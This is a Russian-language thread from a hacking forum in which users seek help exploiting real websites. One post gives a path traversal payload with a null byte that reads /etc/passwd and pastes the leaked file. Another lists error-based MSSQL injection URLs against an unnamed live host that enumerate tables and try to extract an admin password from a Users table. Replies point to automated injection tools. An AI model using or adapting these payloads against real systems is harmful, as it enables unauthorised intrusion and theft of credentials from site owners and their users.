HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 17.08.2011, 01:00
Fenomen Klass
Познающий
Регистрация: 25.12.2010
Сообщений: 74
С нами: 8095286

Репутация: 2
По умолчанию

Цитата:

Сообщение от kokes

спс, попробую, но почему же забей, все с чего то начинали...

Для начала выучи гугл,всмысле запросы т.е inurl: intext: и тд. И научись искать,то что ты спросил уже давно разжевывали на многих форумах.
 
Ответить с цитированием

  #112  
Старый 17.08.2011, 01:00
Vintaha
Участник форума
Регистрация: 10.11.2009
Сообщений: 287
С нами: 8685686

Репутация: 16
По умолчанию

Такую фигню выводит DLE, у меня тот же вопрос, как обойти такую защиту, кто знает намекните хоть где копать?
 
Ответить с цитированием

  #113  
Старый 17.08.2011, 01:00
Perl_Master
Новичок
Регистрация: 02.07.2011
Сообщений: 25
С нами: 7823126

Репутация: 0
По умолчанию

kokes, не слушай никого! Нагугли софтину Havij и пробуй ей раскрутить. Для начала пройдись сканером каким нибудь, jsky допустим.
 
Ответить с цитированием

  #114  
Старый 17.08.2011, 01:00
hugolom
Постоянный
Регистрация: 21.04.2010
Сообщений: 787
С нами: 8452406

Репутация: 320


По умолчанию

ох.. это не скуля.
 
Ответить с цитированием

  #115  
Старый 20.08.2011, 01:00
Kasper1898
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами: 7719446

Репутация: 0
По умолчанию

Кто подскажет как раскрутить Directory Traversal уязвимость в POST
intPartnerType=&nextPage=1&partnerID=&SID=&thisPag e=../../../../../../../../../../etc/passwd%00.png
выдает

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
distcache:x:94:94istcache:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
openvpn:x:102:103:OpenVPN:/etc/openvpn:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
memcached:x:103:104:Memcached daemon:/var/run/memcached:/sbin/nologin
nagios:x:105:106::/var/spool/nagios:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
clam:x:106:108:Clam Anti Virus Checker:/var/clamav:/sbin/nologin

Подскажите как раскручивать эту уязвимость
 
Ответить с цитированием

  #116  
Старый 20.08.2011, 01:00
Dinga
Постоянный
Регистрация: 17.02.2011
Сообщений: 495
С нами: 8017526

Репутация: 18
По умолчанию

 
Ответить с цитированием

  #117  
Старый 20.08.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Цитата:


Кто подскажет как раскрутить Directory Traversal уязвимость в POST



Вот уж не знал что это так называется. Dinga прав, это типичный инклуд.
 
Ответить с цитированием

  #118  
Старый 21.08.2011, 01:00
Kasper1898
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами: 7719446

Репутация: 0
По умолчанию

Dinga
M@ZAX@KEP
Спасибо,буду теперь тож знать что это инклуд))
А кто поможет раскрутить,или разобраться,то я не инклудил не разу еще.
 
Ответить с цитированием

  #119  
Старый 21.08.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

А ссылку на что дали? Извини, но подробнее тебе вряд ли прямо сейчас тут распишут
 
Ответить с цитированием

  #120  
Старый 24.08.2011, 01:00
JokerBaD
Новичок
Регистрация: 18.05.2009
Сообщений: 2
С нами: 8939126

Репутация: 0
По умолчанию

Добрый вечер господа!Требуется ваша помощь!Вообщем суть такова!
есть инъекция 2-й день ломаю голову ну никак не могу полность провести инъекцию я не когда этим не занимался!постараюсь полностью обьяснить свою проблему!
hxxp://хост/default.asp?idAccess=1808310+or+1=(@@version)--
получаю
система - Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2

нашел название БД и 100 таблиц в этой БД
получаю максимально 4-5 полей из каждой таблицы т.к видно фильтруется запятаю(,) пробывал заменить %2С и хец и чар не помогает
пример
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id','login','name'))--
поля вытаскивал таким способом
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='таблица'+and+column_name+not+in+( 'id')+and+column_name+not+in+('login')+and+column_ name+not+in+('name'))--
если увеличиваю кол-во полей выскакивает ошибка что типа URl слишком длнный!
...
и еще нашел в одной таблице там полей мало было нашел поле password поле login но по такому запросу
hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+ca st(password+as+nvarchar)+FROM+Users+where+login='a dmin')--
ошибки не возникает запрос проходит успешно ф-я convert не работает т.к там нужно использовать запятую и exec() так же не получется использовать!

вообщем HELPME!!!

Добавлено через 20 часов 10 минут
Тут есть кто люди????
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.